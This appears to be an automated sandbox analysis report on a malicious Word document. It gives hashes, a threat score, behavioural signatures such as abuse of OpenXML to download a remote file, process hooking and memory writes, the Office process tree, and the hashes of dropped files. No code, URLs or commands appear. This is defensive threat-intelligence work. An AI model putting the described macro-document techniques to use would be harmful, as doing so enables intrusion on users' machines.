Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    26-06-2024 06:31

General

  • Target

    1109cc2af86d8f1938445e968abc37c0_JaffaCakes118.doc

  • Size

    241KB

  • MD5

    1109cc2af86d8f1938445e968abc37c0

  • SHA1

    d8d05cd837412c2a6544c4dd431b62d413a67529

  • SHA256

    57abbecb41daf1a8fe546034062266430bc58151d4912b97b2e7ccbe118ae317

  • SHA512

    10ba11d7d41da9b1ab1a224bb9eae90bcd033083a9c422939fd9c5d570f32eb860383defd60062ff65958dbead890cb488084754b96b57cdbdc77ffc7a7e8fa0

  • SSDEEP

    1536:5terTkw9HnXPJguq73/IKB5Kby0g4XHrTPpyUK/dRYy1n6AmIahOJMnZx:5vw9HXPJguq73/IKBWyUOdSyTGZZx

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1109cc2af86d8f1938445e968abc37c0_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2736
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:1692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{97CDB344-460C-4961-94AC-E755740D47BD}.FSD

      Filesize

      128KB

      MD5

      5f46d08693383e2177cfde8403b55cfc

      SHA1

      f84363074edcd8136c10a09d7572423ce7328305

      SHA256

      c6afa7e5177129eccdab7636971de2c55d5e99bc11e33af174cb3acca05187f0

      SHA512

      b73311785829babdc27fea5a6b62a80292e043139dc005efcf8127ca9bddd33dfb0f5fe51a51da537fe9a631e34548f0b3a54a1febe17efd1648aa6a620498d6

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      12723cbc37f9e2183c2553ac89d4e677

      SHA1

      875bd39a015e10119597c498b5181a82a70e55df

      SHA256

      5831f2473c74d3faf315c89b780faa47194964aa945ddba76a1b7f66d2f2de5e

      SHA512

      3f017ff4c2bc03889ea2c6ea43c8178e21289bf4d8d1eb18a8617c398efc74ee0c6b4e63975a70457a39a8b9b7ba845bc50121dfef3f6d4cad1dd48f1c9276c3

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{BA55C3A0-CDD0-4937-BC72-F1D435F42E4E}.FSD

      Filesize

      128KB

      MD5

      208796f8777ac0785495e63946e51e9e

      SHA1

      245614ea834f94783586341346a84738f619d7d4

      SHA256

      4b35248ec87980e47d2164328ff1fcec07e0b27fdffa91ab5b7cf7597df1e259

      SHA512

      bd68ed0aadbc59d83290d65c7bc85e83584860f8c8d4b9d53966835ca5da1eb4ee5a8d1ee784afd72d2215a2c8e4b82ada2fa35f5b2c4846ac92d17e5c22bba0

    • C:\Users\Admin\AppData\Local\Temp\{A7C1E559-7092-40EA-A154-8DC9DC8339ED}

      Filesize

      128KB

      MD5

      96feca8e64cda928cc6d69e8c7b9697d

      SHA1

      67f704b72f552d23ab39c4cf98e4659bceb880e7

      SHA256

      98a4c5f619845db9d9b42d406d093a691ba6630dd8a6f88a80b71f155b0b824e

      SHA512

      5ea587c315135fd5c794d09ad82e32e6948f2cd1b659040e5eaa2f03e1afd4759686d2edf96d47c4a9a393e4e48802e4fecebf685bfca9f7ba104521b8ab8b76

    • memory/2440-0-0x000000002FA21000-0x000000002FA22000-memory.dmp

      Filesize

      4KB

    • memory/2440-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2440-2-0x000000007135D000-0x0000000071368000-memory.dmp

      Filesize

      44KB

    • memory/2440-11-0x000000007135D000-0x0000000071368000-memory.dmp

      Filesize

      44KB

    • memory/2440-61-0x0000000004490000-0x0000000004590000-memory.dmp

      Filesize

      1024KB

    • memory/2440-516-0x0000000004490000-0x0000000004590000-memory.dmp

      Filesize

      1024KB

    • memory/2440-517-0x000000000F500000-0x000000000F600000-memory.dmp

      Filesize

      1024KB